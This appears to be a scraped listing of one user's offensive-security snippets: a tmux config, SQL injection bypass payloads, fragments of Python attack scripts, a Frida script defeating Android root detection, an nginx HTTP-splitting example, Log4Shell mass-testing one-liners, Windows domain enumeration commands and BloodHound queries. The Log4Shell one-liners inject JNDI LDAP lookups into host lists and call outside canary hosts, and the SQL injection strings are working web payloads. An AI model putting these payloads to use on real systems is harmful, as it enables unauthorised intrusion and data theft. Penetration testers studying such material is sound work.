cyberheartmi9

unbind C-b
set-option -g prefix C-a
bind-key C-a send-prefix
bind | split-window -h
bind - split-window -v
unbind '"'
unbind %
bind r source-file ~/.tmux.conf

cyberheartmi9

`-=[SQL injection Queries]=-

HOW TO SUCCESSFULLY INJECTING SQL INJECTION

[~] after id no. like id=1 +/*!and*/+1=0 [~]
EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5

+div+0
+div false
+Having+1=0+

cyberheartmi9

import requests
import socket
import sys
import random
import string



banner="""

cyberheartmi9

import requests
import sys
import re
import random
import string
import socket
import time


proxies={"http":"127.0.0.1:8080"}

cyberheartmi9

import requests
import sys
import re
import random
import string


banner="""

cyberheartmi9

// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh): 
//  - I added extra whitelisted items to deal with the latest versions 
// 						of RootBeer/Cordova iRoot as of August 6, 2019
//  - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {

    var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",

cyberheartmi9

# PT Reverse Proxy


## Exploiting HTTP Splitting with cloud storage



location ~ /docs/([^/]*/[^/]*)? {
    proxy_pass https://bucket.s3.amazonaws.com/docs-website/$1.html;
}

cyberheartmi9

# Log4Shell Some Proved Testing Methods

# Oneliner 1:
$ cat vulnerable-hosts.txt | sed 's/https\?:\/\///' | xargs -I {} echo '{}/${jndi:ldap://{}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' >> L4SFuzzList
$ httpx -l L4SFuzzList
#Oneliner 2:
$ cat 1.txt | while read host do; do curl -sk --insecure --path-as-is "$host/?test=${jndi:ldap://L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}" -H "X-Api-Version: ${jndi:ldap://log4j.requestcatcher.com/a}" -H "User-Agent: ${jndi:ldap://L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}";done (Credit:https://twitter.com/HackerGautam/status/1469751218926882816)

# The Great resource to learn and earn:
https://github.com/pentesterland/Log4Shell

cyberheartmi9

# Enumeration

# Credential Injection

runas.exe /netonly /user:<domain>\<username> cmd.exe


# enumeration users
users
net user /domain

cyberheartmi9

(THIS LIST IS OBSOLETED, check out the latest version here: https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md )

• Returns computer names and their operating system for statistics purposes

MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS

• Returns a summary report of machines grouped by their operating systems versions, along with number of machines running specific OS version:

MATCH (c:Computer) WHERE c.operatingsystem is not null MATCH (n:Computer {operatingsystem: c.operatingsystem}) RETURN c.operatingsystem as OS, count(distinct n) AS Number ORDER BY Number DESC